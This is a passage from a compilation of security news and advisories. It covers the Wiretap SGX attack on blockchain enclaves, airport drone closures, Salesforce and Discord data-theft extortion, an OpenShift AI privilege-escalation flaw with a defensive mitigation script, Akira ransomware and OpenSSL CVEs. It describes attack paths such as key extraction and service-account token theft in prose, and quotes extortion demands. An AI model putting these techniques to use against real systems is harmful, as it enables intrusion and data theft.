The Wiretap researchers went on to show the types of attacks that are possible when an adversary successfully compromises SGX security. As Intel explains, a key benefit of SGX is remote attestation, a process that verifies that the VMs or other software running inside the enclave are authentic and haven’t been tampered with. Once the software passes inspection, the enclave sends the remote party a digitally signed certificate providing the identity of the tested software and a clean bill of health certifying the software is safe.

The enclave then opens an encrypted connection with the remote party to ensure credentials and private data can’t be read or modified during transit. Remote attestation works with the industry standard Elliptic Curve Digital Signature Algorithm, making it easy for all parties to use and trust.
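
For readers unfamiliar with that flow, the short sketch below runs an ECDSA sign-and-verify round trip with the cryptography package. The quote payload and curve are illustrative stand-ins rather than SGX's actual quote format, but it shows why extracting the private attestation key is fatal: whoever holds it can produce signatures that any verifier will accept.

```python
# Illustrative ECDSA sign/verify round trip; payload and curve are stand-ins.
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.exceptions import InvalidSignature

attestation_key = ec.generate_private_key(ec.SECP256R1())   # held inside the enclave
quote = b"enclave-measurement||report-data"                 # illustrative payload

signature = attestation_key.sign(quote, ec.ECDSA(hashes.SHA256()))

# A remote party verifies with the public key; anyone who extracts the private
# key (as Wiretap does) can mint "valid" quotes for arbitrary software.
try:
    attestation_key.public_key().verify(signature, quote, ec.ECDSA(hashes.SHA256()))
    print("quote accepted")
except InvalidSignature:
    print("quote rejected")
```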

Blockchain services didn’t get the memo
Many cloud-based services rely on TEEs as a foundation for privacy and security within their networks. One such service is Phala, a blockchain provider that allows the drafting and execution of smart contracts. According to the company, computer “state”—meaning system variables, configurations, and other dynamic data an application depends on—is stored and updated only in the enclaves available through SGX, SEV-SNP, and a third trusted enclave available in Arm chips known as TrustZone. This design allows these smart contract elements to update in real time through clusters of “worker nodes”—meaning the computers that host and process smart contracts—with no possibility of any node tampering with or viewing the information during execution.

“The attestation quote signed by Intel serves as the proof of a successful execution,” Phala explained. “It proves that specific code has been run inside an SGX enclave and produces certain output, which implies the confidentiality and the correctness of the execution. The proof can be published and validated by anyone with generic hardware.” Enclaves provided by AMD and Arm work in a similar manner.

The Wiretap researchers created a “testnet,” a local machine for running worker nodes. With possession of the SGX attestation key, the researchers were able to obtain a cluster key that prevents individual nodes from reading or modifying contract state. With that, Wiretap was able to fully bypass the protection. In a paper, the researchers wrote:

We first enter our attacker enclave into a cluster and note it is given access to the cluster key. Although the cluster key is not directly distributed to our worker upon joining a cluster, we initiate a transfer of the key from any other node in the cluster. This transfer is completed without on-chain interaction, given our worker is part of the cluster. This cluster key can then be used to decrypt all contract interactions within the cluster. Finally, when our testnet accepted our node’s enclave as a gatekeeper, we directly receive a copy of the master key, which is used to derive all cluster keys and therefore all contract keys, allowing us to decrypt the entire testnet.
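
To see why that cascade is so damaging, consider the hypothetical key hierarchy below, built with HKDF; it is only a sketch of the general master-to-cluster-to-contract pattern, not Phala's actual derivation scheme.

```python
# Hypothetical master -> cluster -> contract key hierarchy using HKDF.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def derive(parent: bytes, label: bytes) -> bytes:
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=label).derive(parent)

master_key = os.urandom(32)                      # what the gatekeeper hands over
cluster_key = derive(master_key, b"cluster/7")
contract_key = derive(cluster_key, b"contract/42")

# Anyone holding master_key can re-derive every cluster and contract key,
# which is why the testnet compromise described above cascades.
assert derive(derive(master_key, b"cluster/7"), b"contract/42") == contract_key
print("all downstream keys recoverable from the master key")
```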

The researchers performed similar bypasses against a variety of other blockchain services, including Secret, Crust, and IntegriTEE. After the researchers privately shared the results with these companies, they took steps to mitigate the attacks.

Both Battering RAM and Wiretap work only against DDR4 memory chips because the newer DDR5 runs at much higher bus speeds with a multi-cycle transmission protocol. Neither attack works against a similar Intel protection known as TDX, which works only with DDR5.

As noted earlier, Intel and AMD both exclude physical attacks like Battering RAM and Wiretap from the threat model their TEEs are designed to withstand. The Wiretap researchers showed that despite these warnings, Phala and many other cloud-based services still rely on the enclaves to preserve the security and privacy of their networks. The research also makes clear that the TEE defenses completely break down in the event of an attack targeting the hardware supply chain.

For now, the only feasible solution is for chipmakers to replace deterministic encryption with a stronger form of protection. Given the challenges of making such encryption schemes scale to vast amounts of RAM, it’s not clear when that may happen.

Munich Airport Drone Sightings Force Flight Cancellations, Adding To Wave Of European Incidents

dronexl.co - Haye Kesteloo - October 2, 2025

Drone sightings Thursday evening forced Germany’s Munich airport to suspend operations, cancelling 17 flights and disrupting travel for nearly 3,000 passengers. The incident marks the latest in a concerning series of mysterious drone closures at major European airports—but whether these sightings represent genuine security threats or mass misidentification remains an urgent question.

The pattern echoes both recent suspected hybrid attacks in Scandinavia and last year’s New Jersey drone panic that turned out to be largely misidentified aircraft and celestial objects.

Munich Operations Suspended for Hours
German air traffic control restricted flight operations at Munich airport from 10:18 p.m. local time Thursday after multiple drone sightings, later suspending them entirely. The airport remained closed until 2:59 a.m. UTC Friday (4:59 a.m. local time).

Another 15 arriving flights were diverted to Stuttgart, Nuremberg, Vienna, and Frankfurt. Flight tracking service Flightradar24 confirmed the airport would remain closed until early Friday morning.

The first arriving flight was expected at 5:25 a.m., with the first departure scheduled for 5:50 a.m., according to the airport’s website.

European Airports on Edge After Suspected Russian Incidents
The Munich closure comes just days after a wave of drone incidents shut down multiple airports across Denmark and Norway in late September. Copenhagen Airport closed for nearly four hours on September 22 after two to three large drones were spotted in controlled airspace. Oslo’s Gardermoen Airport also briefly closed that same night.

Danish Prime Minister Mette Frederiksen called those incidents “the most serious attack on Danish critical infrastructure to date” and suggested Russia could be behind the disruption. Danish authorities characterized the activity as a likely hybrid operation intended to unsettle the public and disrupt critical infrastructure.

Several more Danish airports—including Aalborg, Billund, and military bases—experienced similar incidents in the following days. Denmark is now considering whether to invoke NATO’s Article 4, which enables member states to request consultations over security concerns.

Russian President Vladimir Putin joked Thursday that he would not fly drones over Denmark anymore, though Moscow has denied responsibility for the incidents. Denmark has stopped short of saying definitively who is responsible, but Western officials point to a pattern of Russian drone violations of NATO airspace in Poland, Romania, and Estonia.

The Misidentification Problem: Lessons from New Jersey
While European officials investigate potential hybrid warfare, the incidents raise uncomfortable parallels to the New Jersey drone panic of late 2024—a mass sighting event that turned out to be largely misidentification of routine aircraft and celestial objects.

Between November and December 2024, thousands of “drone” reports flooded in from New Jersey and neighboring states. The phenomenon sparked widespread fear, congressional hearings, and even forced then-President-elect Donald Trump to cancel a trip to his Bedminster golf club.

Federal investigations later revealed the reality: most sightings were manned aircraft operating lawfully. A joint FBI and DHS statement in December noted: “Historically, we have experienced cases of mistaken identity, where reported drones are, in fact, manned aircraft or facilities.”

TSA documents released months later showed that one of the earliest incidents—which forced a medical helicopter carrying a crash victim to divert—involved three commercial aircraft approaching nearby Solberg Airport. “The alignment of the aircraft gave the appearance to observers on the ground of them hovering in formation while they were actually moving directly at the observers,” the analysis found.

Dr. Will Austin, president of Warren County Community College and a national drone expert, reviewed numerous videos during the panic. He found that “many of the reports received involve misidentification of manned aircraft.” Even Jupiter, which was particularly bright in New Jersey’s night sky that season, was mistaken for a hovering drone.

The panic had real consequences: laser-pointing incidents at aircraft spiked to 59 in December 2024—more than the 49 incidents recorded for all of 2023, according to the FAA.

Munich Already on Edge
Munich was already placed on edge this week when its popular Oktoberfest was temporarily closed due to a bomb threat, and explosives were discovered in a residential building in the city’s north.

Whether Thursday’s drone sightings represent genuine security threats similar to the suspected Russian operations in Scandinavia, or misidentified routine aircraft like in New Jersey, remains under investigation. German authorities have not released details about what was observed or where the objects may have originated.

DroneXL’s Take
We’re watching two very different scenarios collide in dangerous ways. The Denmark and Norway incidents appear to involve sophisticated actors—large drones, coordinated timing, professional operation over multiple airports and military installations. Danish intelligence has credible reasons to suspect state-sponsored hybrid warfare, particularly given documented Russian drone violations of NATO airspace in Poland and Romania.

But the New Jersey panic showed how quickly mass hysteria can spiral when people start looking up. Once the narrative took hold, every airplane on approach, every bright planet, every hobbyist quadcopter became a “mystery drone.” Federal investigators reviewed over 5,000 reports and found essentially nothing anomalous—yet 78% of Americans still believed the government was hiding something.

Munich sits uncomfortably between these realities. Is it part of the escalating pattern of suspected Russian hybrid attacks on European infrastructure? Or is it another case of observers misidentifying routine air traffic in an atmosphere of heightened anxiety?

The distinction matters enormously. Real threats require sophisticated counter-drone systems and potentially invoke NATO collective defense mechanisms. False alarms waste resources, create dangerous situations (like those laser-pointing incidents), and damage the credibility of legitimate security concerns.

Airport authorities worldwide need better drone detection technology that can definitively distinguish between aircraft types. Equally important: they need to be transparent about what they’re actually seeing, rather than leaving information vacuums that fill with speculation and fear.

Another drone sighting at Munich Airport
  • Munich Airport (www.munich-airport.com)
    04.10.2025 (update 5 p.m.)

Following drone sightings late on Thursday and Friday evening and further drone sightings early on Saturday morning, the start of flight operations on 4 October 2025 was delayed. Flight operations were gradually ramped up and stabilised over the course of the afternoon. Passengers were asked to check the status of their flight on their airline's website before travelling to the airport. Of the more than 1,000 take-offs and landings planned for Saturday, airlines cancelled around 170 flights during the day for operational reasons.

As on previous nights, Munich Airport worked with the airlines to immediately provide for passengers in the terminals. These activities will continue on Saturday evening and into Sunday night. Numerous camp beds will again be set up, and blankets, air mattresses, drinks and snacks will be distributed. In addition, some shops, restaurants and a pharmacy in the public area will extend their opening hours and remain open throughout the night. Alongside the many employees of the airport, airlines and service providers, numerous volunteers are also on duty.

When a suspected drone is sighted, the safety of travellers is the top priority. Reporting chains between air traffic control, the airport and police authorities have been established for years. It is important to emphasise that the detection of and defence against drones are sovereign tasks and are the responsibility of the federal and state police.

Press: Drone sightings at Munich Airport

Munich Airport (www.munich-airport.com)
October 3, 2025 (Update)

On Thursday evening (October 2), several drones were sighted in the vicinity of and on the grounds of Munich Airport. The first reports were received at around 8:30 p.m. Initially, areas around the airport, including Freising and Erding, were affected.

The state police immediately launched extensive search operations with a large number of officers in the vicinity of the airport. At the same time, the federal police immediately carried out surveillance and search operations on the airport grounds. However, it has not yet been possible to identify the perpetrator.

At around 9:05 p.m., drones were reported near the airport fence. At around 10:10 p.m., the first sighting was made on the airport grounds. As a result, flight operations were gradually suspended at 10:18 p.m. for safety reasons. The preventive closure affected both runways from 10:35 p.m. onwards. The sightings ended around midnight. According to the airport operator, there were 17 flight cancellations and 15 diversions by that time. Helicopters from the federal police and the Bavarian state police were also deployed to monitor the airspace and conduct searches.

Munich Airport, in cooperation with the airlines, immediately took care of the passengers in the terminals. Camp beds were set up, and blankets, drinks, and snacks were provided. In addition, 15 arriving flights were diverted to Stuttgart, Nuremberg, Vienna, and Frankfurt. Flight operations resumed as normal today (Friday, October 3).

Responsibilities and cooperation

Within the scope of their respective tasks, the German Air Traffic Control (DFS), the state aviation security authorities, the state police forces, and the federal police are responsible for the detection and defense against drones at commercial airports.

The measures are carried out in close coordination between all parties involved and the airport operator on the basis of jointly developed emergency plans. The local state police force is responsible for preventive policing in the vicinity of the airport, while the federal police is responsible for policing on the airport grounds. Criminal prosecution is the responsibility of the state police.

Note: Please understand that for tactical reasons, the security authorities are unable to provide any further information on the systems and measures used. Further investigations will be conducted by the Bavarian police, as they have jurisdiction in this matter.

Hacking group claims theft of 1 billion records from Salesforce customer databases | TechCrunch

techcrunch.com - Lorenzo Franceschi-Bicchierai
Zack Whittaker
6:17 AM PDT · October 3, 2025

The hacking group claims to have stolen about a billion records from companies, including FedEx, Qantas, and TransUnion, who store their customer and company data in Salesforce.

A notorious predominantly English-speaking hacking group has launched a website to extort its victims, threatening to release about a billion records stolen from companies who store their customers’ data in cloud databases hosted by Salesforce.

The loosely organized group, which has been known as Lapsus$, Scattered Spider, and ShinyHunters, has published a dedicated data leak site on the dark web, called Scattered LAPSUS$ Hunters.

The website, first spotted by threat intelligence researchers on Friday and seen by TechCrunch, aims to pressure victims into paying the hackers to avoid having their stolen data published online.

“Contact us to regain control on data governance and prevent public disclosure of your data,” reads the site. “Do not be the next headline. All communications demand strict verification and will be handled with discretion.”

Over the last few weeks, the ShinyHunters gang allegedly hacked dozens of high-profile companies by breaking into their cloud-based databases hosted by Salesforce.

Insurance giant Allianz Life, Google, fashion conglomerate Kering, the airline Qantas, carmaking giant Stellantis, credit bureau TransUnion, and the employee management platform Workday, among several others, have confirmed their data was stolen in these mass hacks.

The hackers’ leak site lists several alleged victims, including FedEx, Hulu (owned by Disney), and Toyota Motors, none of which responded to a request for comment on Friday.

It’s not clear if the companies known to have been hacked but not listed on the hacking group’s leak site have paid a ransom to the hackers to prevent their data from being published. When reached by TechCrunch, a representative from ShinyHunters said, “there are numerous other companies that have not been listed,” but declined to say why.

At the top of the site, the hackers mention Salesforce and demand that the company negotiate a ransom, threatening that otherwise “all your customers [sic] data will be leaked.” The tone of the message suggests that Salesforce has not yet engaged with the hackers.

Salesforce spokesperson Nicole Aranda provided a link to the company’s statement, which notes that the company is “aware of recent extortion attempts by threat actors.”

“Our findings indicate these attempts relate to past or unsubstantiated incidents, and we remain engaged with affected customers to provide support,” the statement reads. “At this time, there is no indication that the Salesforce platform has been compromised, nor is this activity related to any known vulnerability in our technology.”

Aranda declined to comment further.

For weeks, security researchers have speculated that the group, which has historically eschewed a public presence online, was planning to publish a data leak website to extort its victims.

Historically, such websites have been associated with foreign, often Russian-speaking, ransomware gangs. In the last few years, these organized cybercrime groups have evolved from stealing and encrypting their victims’ data and then privately asking for a ransom, to simply threatening to publish the stolen data online unless they get paid.

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

securityaffairs.com
October 04, 2025
Pierluigi Paganini

Cybersecurity firm GreyNoise reported a 500% surge in scans targeting Palo Alto Networks login portals on October 3, 2025, the highest level of activity it has observed in three months.

On October 3, the researchers observed that over 1,285 IPs scanned Palo Alto portals, up from a usual 200. The experts reported that 93% of the IPs were suspicious, 7% malicious.
Most originated from the U.S., with smaller clusters in the U.K., Netherlands, Canada, and Russia.

GreyNoise described the traffic as targeted and structured, aimed at Palo Alto login portals and split across distinct scanning clusters.

The scans targeted emulated Palo Alto profiles and focused mainly on systems in the U.S. and Pakistan, indicating coordinated, targeted reconnaissance.

GreyNoise found that the recent Palo Alto scanning mirrors earlier Cisco ASA activity, showing regional clustering and shared TLS fingerprints linked to infrastructure in the Netherlands. Both campaigns used similar tools, suggesting possible shared infrastructure or operators. The overlap follows a Cisco ASA scanning surge that preceded the disclosure of two zero-day vulnerabilities.

“Both Cisco ASA and Palo Alto login scanning traffic in the past 48 hours share a dominant TLS fingerprint tied to infrastructure in the Netherlands. This comes after GreyNoise initially reported an ASA scanning surge before Cisco’s disclosure of two ASA zero-days,” reads the report published by GreyNoise. “In addition to a possible connection to ongoing Cisco ASA scanning, GreyNoise identified concurrent surges across remote access services. While suspicious, we are unsure if this activity is related.”

GreyNoise noted that in July, spikes in Palo Alto scanning sometimes preceded the disclosure of new flaws within six weeks; the researchers are monitoring whether the latest surge signals another disclosure.
“GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats,” the report concludes.

Update on a Security Incident Involving Third-Party Customer Service

discord.com

Discord
October 3, 2025

At Discord, protecting the privacy and security of our users is a top priority. That’s why it’s important to us that we’re transparent with them about events that impact their personal information.

Discord recently discovered an incident where an unauthorized party compromised one of Discord’s third-party customer service providers.
This incident impacted a limited number of users who had communicated with our Customer Support or Trust & Safety teams.
This unauthorized party did not gain access to Discord directly.
No messages or activities were accessed beyond what users may have discussed with Customer Support or Trust & Safety agents.
We immediately revoked the customer support provider’s access to our ticketing system and continue to investigate this matter.
We’re working closely with law enforcement to investigate this matter.
We are in the process of emailing the users impacted.

Recently, we discovered an incident where an unauthorized party compromised one of Discord’s third-party customer service providers. The unauthorized party then gained access to information from a limited number of users who had contacted Discord through our Customer Support and/or Trust & Safety teams.

As soon as we became aware of this attack, we took immediate steps to address the situation. This included revoking the customer support provider’s access to our ticketing system, launching an internal investigation, engaging a leading computer forensics firm to support our investigation and remediation efforts, and engaging law enforcement.

We are in the process of contacting impacted users. If you were impacted, you will receive an email from noreply@discord.com. We will not contact you about this incident via phone – official Discord communications channels are limited to emails from noreply@discord.com.

What happened?
An unauthorized party targeted our third-party customer support services to access user data, with the aim of extorting a financial ransom from Discord.

What data was involved?
The data that may have been impacted was related to our customer service system. This may include:

Name, Discord username, email and other contact details if provided to Discord customer support
Limited billing information such as payment type, the last four digits of your credit card, and purchase history if associated with your account
IP addresses
Messages with our customer service agents
Limited corporate data (training materials, internal presentations)
The unauthorized party also gained access to a small number of government‑ID images (e.g., driver’s license, passport) from users who had appealed an age determination. If your ID may have been accessed, that will be specified in the email you receive.

What data was not involved?
Full credit card numbers or CCV codes
Messages or activity on Discord beyond what users may have discussed with customer support
Passwords or authentication data
What are we doing about this?
Discord has and will continue to take all appropriate steps in response to this situation. As standard, we will continue to frequently audit our third-party systems to ensure they meet our security and privacy standards. In addition, we have:

Notified relevant data protection authorities.
Proactively engaged with law enforcement to investigate this attack.
Reviewed our threat detection systems and security controls for third-party support providers.
Taking next steps
Looking ahead, we recommend impacted users stay alert when receiving messages or other communication that may seem suspicious. We have service agents on hand to answer questions and provide additional support.

We take our responsibility to protect your personal data seriously and understand the inconvenience and concern this may cause.

'Delightful' Red Hat OpenShift AI bug allows full takeover

theregister.com • The Register
by Jessica Lyons
Wed 1 Oct 2025 // 19:35 UTC

Who wouldn't want root access on cluster master nodes?

A 9.9-out-of-10-severity bug in Red Hat's OpenShift AI service could allow a remote attacker with minimal authentication to steal data, disrupt services, and fully hijack the platform.

"A low-privileged attacker with access to an authenticated account, for example as a data scientist using a standard Jupyter notebook, can escalate their privileges to a full cluster administrator," the IBM subsidiary warned in a security alert published earlier this week.

"This allows for the complete compromise of the cluster's confidentiality, integrity, and availability," the alert continues. "The attacker can steal sensitive data, disrupt all services, and take control of the underlying infrastructure, leading to a total breach of the platform and all applications hosted on it."

Red Hat deemed the vulnerability, tracked as CVE-2025-10725, "important" despite its 9.9 CVSS score, which garners a critical-severity rating from the National Vulnerability Database - and basically any other organization that issues CVEs. This, the vendor explained, is because the flaw requires some level of authentication, albeit minimal, for an attacker to jeopardize the hybrid cloud environment.

Users can mitigate the flaw by removing the ClusterRoleBinding that links the kueue-batch-user-role ClusterRole with the system:authenticated group. "The permission to create jobs should be granted on a more granular, as-needed basis to specific users or groups, adhering to the principle of least privilege," Red Hat added.

Additionally, the vendor suggests not granting broad permissions to system-level groups.
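As a rough illustration of that mitigation (a sketch, not an official Red Hat remediation script), the following Python snippet uses the official Kubernetes Python client to list any ClusterRoleBinding that ties the kueue-batch-user-role ClusterRole to the system:authenticated group, so an administrator can review and remove it; the actual deletion call is left commented out.

    # Sketch: find ClusterRoleBindings granting kueue-batch-user-role to all
    # authenticated users, per the mitigation described above. Assumes the
    # "kubernetes" Python client and a kubeconfig with rights to read RBAC.
    from kubernetes import client, config

    def find_risky_bindings():
        config.load_kube_config()  # or config.load_incluster_config() inside a pod
        rbac = client.RbacAuthorizationV1Api()
        risky = []
        for crb in rbac.list_cluster_role_binding().items:
            if crb.role_ref.name != "kueue-batch-user-role":
                continue
            for subject in (crb.subjects or []):
                if subject.kind == "Group" and subject.name == "system:authenticated":
                    risky.append(crb.metadata.name)
        return risky

    if __name__ == "__main__":
        for name in find_risky_bindings():
            print("Review and consider deleting ClusterRoleBinding:", name)
            # Deleting the binding is the mitigation itself (verify before acting):
            # client.RbacAuthorizationV1Api().delete_cluster_role_binding(name)

Per Red Hat's least-privilege guidance, job-creation rights would then be re-granted only to the specific users or groups that need them, via narrower bindings.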

Red Hat didn't immediately respond to The Register's inquiries, including if the CVE has been exploited. We will update this story as soon as we receive any additional information.

Whose role is it anyway?
OpenShift AI is an open platform for building and managing AI applications across hybrid cloud environments.

As noted earlier, it includes a ClusterRole named "kueue-batch-user-role." The security issue here exists because this role is incorrectly bound to the system:authenticated group.

"This grants any authenticated entity, including low-privileged service accounts for user workbenches, the permission to create OpenShift Jobs in any namespace," according to a Bugzilla flaw-tracking report.
One of these low-privileged accounts could abuse this to schedule a malicious job in a privileged namespace, configure it to run with a high-privilege ServiceAccount, exfiltrate that ServiceAccount token, and then "progressively pivot and compromise more powerful accounts, ultimately achieving root access on cluster master nodes and leading to a full cluster takeover," the report said.

"Vulnerabilities offering a path for a low privileged user to fully take over an environment needs to be patched in the form of an incident response cycle, seeking to prove that the environment was not already compromised," Trey Ford, chief strategy and trust officer at crowdsourced security company Bugcrow said in an email to The Register.

In other words: "Assume breach," Ford added.

"The administrators managing OpenShift AI infrastructure need to patch this with a sense of urgency - this is a delightful vulnerability pattern for attackers looking to acquire both access and data," he said. "Security teams must move with a sense of purpose, both verifying that these environments have been patched, then investigating to confirm whether-and-if their clusters have been compromised."

Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less - Arctic Wolf

Since late July 2025, Arctic Wolf has observed an ongoing surge in Akira ransomware activity targeting SonicWall firewalls through malicious SSL VPN logins.

ShinyHunters launches Salesforce data leak site to extort 39 victims

bleepingcomputer.com By Sergiu Gatlan
October 3, 2025

An extortion group has launched a new data leak site to publicly extort dozens of companies impacted by a wave of Salesforce breaches, leaking samples of data stolen in the attacks.

The threat actors responsible for these attacks claim to be part of the ShinyHunters, Scattered Spider, and Lapsus$ groups, collectively referring to themselves as "Scattered Lapsus$ Hunters."

Today, they launched a new data leak site listing 39 companies impacted by the attacks. Each entry includes samples of data allegedly stolen from victims' Salesforce instances and warns the victims to reach out to "prevent public disclosure" of their data before the October 10 deadline.

The companies being extorted on the data leak site include well-known brands and organizations, including FedEx, Disney/Hulu, Home Depot, Marriott, Google, Cisco, Toyota, Gap, McDonald's, Walgreens, Instacart, Cartier, Adidas, Saks Fifth Avenue, Air France & KLM, TransUnion, HBO MAX, UPS, Chanel, and IKEA.

"All of them have been contacted long ago, they saw the email because I saw them download the samples multiple times. Most of them chose to not disclose and ignore," ShinyHunters told BleepingComputer.

"We highly advise you proceed into the right decision, your organisation can prevent the release of this data, regain control over the situation and all operations remain stable as always. We highly recommend a decision-maker to get involved as we are presenting a clear and mutually beneficial opportunity to resolve this matter," they warned on the leak site.

The threat actors also added a separate entry requesting that Salesforce pay a ransom to prevent all impacted customers' data (approximately 1 billion records containing personal information) from being leaked.

"Should you comply, we will withdraw from any active or pending negotiation indiviually from your customers. Your customers will not be attacked again nor will they face a ransom from us again, should you pay," they added.

The extortion group also threatened the company, stating that it would help law firms pursue civil and commercial lawsuits against Salesforce following the data breaches and warned that the company had also failed to protect customers' data as required by the European General Data Protection Regulation (GDPR).

Cybersecurity: an SME paralyzed by a ransomware attack

24heures.ch Marc Renfer
Published on 03.10.2025 at 6:30 a.m.

How a cyberattack is paralyzing an SME in French-speaking Switzerland

Targeted by hackers, the company Bugnard SA is at a standstill. Its director describes the week of hell he has been living through.
In brief:

* Bugnard SA is dealing with a paralyzing cyberattack.
* Encrypted servers are preventing order processing.
* The Akira group is demanding a ransom in bitcoin.

The company may not be known to the general public, but the tools and measuring instruments supplied by Bugnard SA have almost certainly been used to install or repair an outlet, a meter, or an electrical cabinet near you.

A great many installers buy their supplies from this SME based in Cheseaux-sur-Lausanne, which has branches in Geneva and Zurich. A leader in the sale of equipment for electricians, the company does 72% of its business online. But late in the day on September 24, everything came to an abrupt halt.

"Around 5:30 p.m., all our systems were blocked. We quickly understood we were under cyberattack. Since then, we have been completely at a standstill," says Christian Degouy, CEO of Bugnard, who bought the company from the founder's family in 2020.

Since the attack, he has been living "in a tunnel." The day after the attack, the team discovered a file containing a ransom demand: 450,000 dollars, to be paid in bitcoin. The group behind the attack was quickly identified: Akira, an organization well known to cybersecurity specialists.
A Russian signature behind the attack

First seen in March 2023, Akira is a structured ransomware group whose developers are believed to be based in Russia or former Soviet republics. They rent their hacking tool to affiliates who mostly target SMEs in Western Europe and North America. The recent Vaud-based victim now appears on the group's dark web site, along with a description of the stolen data.

The technical analysis is still underway, but one hypothesis points to a potential flaw in a firewall.

"We knew about the risk of these attacks," Christian Degouy admits. "We had even started the process of taking out cyber insurance. But since we were in the middle of moving our headquarters, we postponed it," he sighs.
Total paralysis

The consequences are severe. All of the servers are encrypted, including the backups designed precisely to cope with such a situation. The online store is down. No more orders, no more logistics, for a company of 30 employees that normally handles more than 1,000 orders per week.

"Our 4,800 customers are mostly electricians, small and large. They depend on us to do their work. And we are paralyzed. We can no longer issue a delivery note or find out where an item sits in our stock, which has more than 9,000 storage locations."

Its main warehouse covers more than 2,500 m². Without the IT systems, finding equipment has sometimes become impossible. "When a customer urgently needs a product we can locate, they come by and we write it down by hand. We have gone back to pen and paper."

Fortunately, email still works and keeps the lines of communication open. The only activity still running is instrument calibration in Geneva, which relies on a separate system and is not affected by the attack.
The payment dilemma

Behind the scenes, negotiations have begun. A specialized service provider is keeping in contact with the cybercriminals. Akira has lowered its demand: first to 250,000, then to 200,000 dollars. "I don't want to pay. But if we haven't restarted by Friday, I will pay on Sunday evening," the CEO says flatly. "It's hard to say, but this group has a 'reputation': it seems to hand over the key when you pay."

A criminal complaint has been filed. The cybercrime unit of the canton of Vaud, which told the company it is handling around fifty similar cases, has been brought in.

Bugnard SA hopes to be able to restart its operations by the end of the week. Doubt remains: rebuilding everything takes time, and the risk of reinstalling a contaminated system has to be ruled out.

"The feeling of helplessness is unbearable. What I want is for this not to happen to anyone else," Christian Degouy concludes. For other business owners, he offers three simple pieces of advice: enable two-factor authentication on all access points, keep offline backups, and keep software up to date.

Security update: Incident related to Red Hat Consulting GitLab instance

We are writing to provide an update regarding a security incident related to a specific GitLab environment used by our Red Hat Consulting team. Red Hat takes the security and integrity of our systems and the data entrusted to us extremely seriously, and we are addressing this issue with the highest priority.

What happened
We recently detected unauthorized access to a GitLab instance used for internal Red Hat Consulting collaboration in select engagements. Upon detection, we promptly launched a thorough investigation, removed the unauthorized party’s access, isolated the instance, and contacted the appropriate authorities. Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance.

We have now implemented additional hardening measures designed to help prevent further access and contain the issue.

Scope and impact on customers
We understand you may have questions about whether this incident affects you. Based on our investigation to date, we can share:

Impact on Red Hat products and supply chain: At this time, we have no reason to believe this security issue impacts any of our other Red Hat services or products, including our software supply chain or downloading Red Hat software from official channels.
Consulting customers: If you are a Red Hat Consulting customer, our analysis is ongoing. The compromised GitLab instance housed consulting engagement data, which may include, for example, Red Hat’s project specifications, example code snippets, and internal communications about consulting services. This GitLab instance typically does not house sensitive personal data. While our analysis remains ongoing, we have not identified sensitive personal data within the impacted data at this time. We will notify you directly if we believe you have been impacted.
Other customers: If you are not a Red Hat Consulting customer, there is currently no evidence that you have been affected by this incident.
For clarity, this incident is unrelated to a Red Hat OpenShift AI vulnerability (CVE-2025-10725) that was announced yesterday.

Our next steps
We are engaging directly with any customers who may be impacted.

Thank you for your continued trust in Red Hat. We appreciate your patience as we continue our investigation.

Out-of-bounds read & write in RFC 3211 KEK Unwrap (CVE-2025-9230)

OpenSSL Security Advisory [30th September 2025]
===============================================
https://openssl-library.org/news/secadv/20250930.txt

Out-of-bounds read & write in RFC 3211 KEK Unwrap (CVE-2025-9230)
=================================================================

Severity: Moderate

Issue summary: An application trying to decrypt CMS messages encrypted using
password based encryption can trigger an out-of-bounds read and write.

Impact summary: This out-of-bounds read may trigger a crash which leads to
Denial of Service for an application. The out-of-bounds write can cause
a memory corruption which can have various consequences including
a Denial of Service or Execution of attacker-supplied code.

Although the consequences of a successful exploit of this vulnerability
could be severe, the probability that the attacker would be able to
perform it is low. Besides, password based (PWRI) encryption support in CMS
messages is very rarely used. For that reason the issue was assessed as
Moderate severity according to our Security Policy.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as the CMS implementation is outside the OpenSSL FIPS module
boundary.

OpenSSL 3.5, 3.4, 3.3, 3.2, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

OpenSSL 3.0 users should upgrade to OpenSSL 3.0.18.

OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1zd.
(premium support customers only)

OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zm.
(premium support customers only)

This issue was reported on 9th August 2025 by Stanislav Fort (Aisle Research).
The fix was developed by Stanislav Fort (Aisle Research) and Viktor Dukhovni.

Timing side-channel in SM2 algorithm on 64 bit ARM (CVE-2025-9231)
==================================================================

Severity: Moderate

Issue summary: A timing side-channel which could potentially allow remote
recovery of the private key exists in the SM2 algorithm implementation on 64 bit
ARM platforms.

Impact summary: A timing side-channel in SM2 signature computations on 64 bit
ARM platforms could allow recovering the private key by an attacker.

While remote key recovery over a network was not attempted by the reporter,
timing measurements revealed a timing signal which may allow such an attack.

OpenSSL does not directly support certificates with SM2 keys in TLS, and so
this CVE is not relevant in most TLS contexts. However, given that it is
possible to add support for such certificates via a custom provider, coupled
with the fact that in such a custom provider context the private key may be
recoverable via remote timing measurements, we consider this to be a Moderate
severity issue.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as SM2 is not an approved algorithm.

OpenSSL 3.1, 3.0, 1.1.1 and 1.0.2 are not vulnerable to this issue.

OpenSSL 3.5, 3.4, 3.3, and 3.2 are vulnerable to this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

This issue was reported on 18th August 2025 by Stanislav Fort (Aisle Research)
